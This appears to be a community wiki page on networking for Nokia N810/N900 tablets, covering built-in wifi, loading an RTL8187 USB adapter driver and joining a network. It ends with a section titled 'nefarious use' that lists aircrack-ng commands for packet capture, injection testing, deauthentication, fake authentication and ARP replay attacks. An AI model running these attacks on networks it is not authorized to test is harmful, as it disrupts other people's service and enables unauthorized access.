[edit] Built-in wifi (Managed)

The built-in wireless card is pictured in detail here:

This interface is wlan0 and uses the closed-source cx3110x driver. For the NITdroid project an open-source driver was created. As it stands, the internal wifi chipset is not capable of injection with either of these drivers.

A useful utility is WifiInfo which shows signal strength, internal IP address, power savings toggle and a AP scan option.

Some people have reported difficulty connecting to university wifi systems which use PEAP+MSCHAPv2 authentication. See the PEAP+MSCHAPv2 WiFi authentication setup page for how to resolve this issue.

[edit] ad hoc wifi

Main article: N900 ad hoc wifi hotspot

[edit] External USB wifi (r8187)

This is the legacy drive for the RTL8187 chipset. The Alfa 500mW b/g usb adapter uses this as do knock-offs. The Alfa goes for about $35, while the knock-off is about $25.

You are going to need more power than the N810 can provide for itself. There are many ways to do this. [1] of power injection

Download the archive attached to this post. Untar it somewher (for example to Documents)

# cd /home/user/MyDocs/.documents/
# tar -xvf rtl8187_diablo.tar
# cd rtl8187/

Make script executable

# chmod a+x r8187-start


 echo host > /sys/devices/platform/msusb_hdrc/mode
 insmod ieee80211_crypt-rtl.ko
 insmod ieee80211-rtl.ko
 insmod r8187.ko
 echo -n 1 > /sys/bus/usb/devices/1-1/bConfigurationValue

The first line tells the N810 to set the USB mode as host The next 3 lines insert the kernel modules in the right order. The last line is optional, if you have a proper powered hub comment it out, if you are using a y-cable or similar then this tells the N810 to ignore the lack of power messages and use the device anyway. No, this will not work if you do not have the full power requirements; it is merely for when you fulfill the power requirement and the device does not know it.

Plug the microusb end into your N810. A couple error message will pop up, these are normal and just ignore them."usb device not supported". then "Unable to connect, no file system available" (hit OK)

# lsusb        (as root, else there will be no output)
Bus 001 Device 012: ID 0bda:8187 Realtek Semiconductor Corp.
Bus 001 Device 001: ID 0000:0000

if no output then you are not root. If the Realtek doesn't show up then try lsusb a few more times, if that doesn't work it means that the wifi card is not being supplied enough power. That is the tricky part regarding external (also card chipset must be supported) usb wifi cards.

Now time to execute the script

$ ./r8187-start

No output should show (if you run this too early, as in before the popup error messages then it might also have no output). If you have already run this script this session (haven't turned off N810 since) then it will state that it can't insert the kernel modules. If it states that "/sys/bus/usb/devices/1-1/bConfigurationValue" does not exist, it means it is not getting enough power. It might also state that if you have not plugged the cable in.

At this point let's see if everything works.

# bash
# airmon-ng
Interface	Chipset		Driver
wlan0		Nokia 770	cx3110x
wlan1		RTL8187		r8187
# airodump-ng wlan1

At this point we are not using aircrack-ng suite for nefarious use. We are using it because it's reliable and the built-in (and community created) tools are hard-coded for wlan0. A list of APs/routers should appear as it sees them. We are doing this in leu of a proper scanner (Connections and WifiInfo are hard-coded and iwlist scan wlan1 doesn't work for some reason)

[edit] connect to router

connect to AP/router

# iwconfig wlan1 essid MYNETWORKHERE

input key to open AP

# iwconfig wlan1 key off

check to see if associated with AP

# iwconfig wlan1

obtain IP address via DHCP (if obtaining leave fails, just run command again until it succeeds)

# /sbin/udhcpc -n -q -i wlan1

select DUMMY from Network connection dialog box and browse the web!

If browsing doesn't work, then check if you can ping IP


If that works but ping doesn't then DNS isn't working

nano /etc/resolv.conf

And make sure a line like this exists:


which should point to your router's admin page (default gateway).

[edit] nefarious use

while on the subject, instead of connecting to router, let's change the mode from Managed to Monitor (injection-capable)

# airmon start wlan1

Now run airodump to capture packets

# airodump-ng wlan1 -w savedfile 

Choose a channel to increased efficiency

# airodump-ng wlan1 -w savedfile -c 6

Open a new terminal window or tab to run some attacks while airodump is running. First we test if injection is working. Not all routers are suseptable to packet injection, range is also a major factor. If at least one router gets over 0% then injection is in fact working correctly.

# aireplay wlan1 -9

Deauthenticate attack. The X's are the BSSID of the Access Point/Router

# aireplay wlan1 -0 0 -a XX:XX:XX:XX:XX:XX

Deauthenticate user with the c parameter.

# aireplay wlan1 -0 0 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX

Fake authentication.

# aireplay wlan1 -1 5 -a XX:XX:XX:XX:XX:XX

ARP attack. Takes awhile to start injecting packets. ARPs good, ACKs bad.

# aireplay wlan1 -3 -b XX:XX:XX:XX:XX:XX

[edit] Ethernet

Main article: USB to ethernet networking

[edit] Bluetooth DUN

Main article: Bluetooth DUN

[edit] Bluetooth PAN

Main article: Bluetooth PAN

[edit] USB networking

Main article: USB networking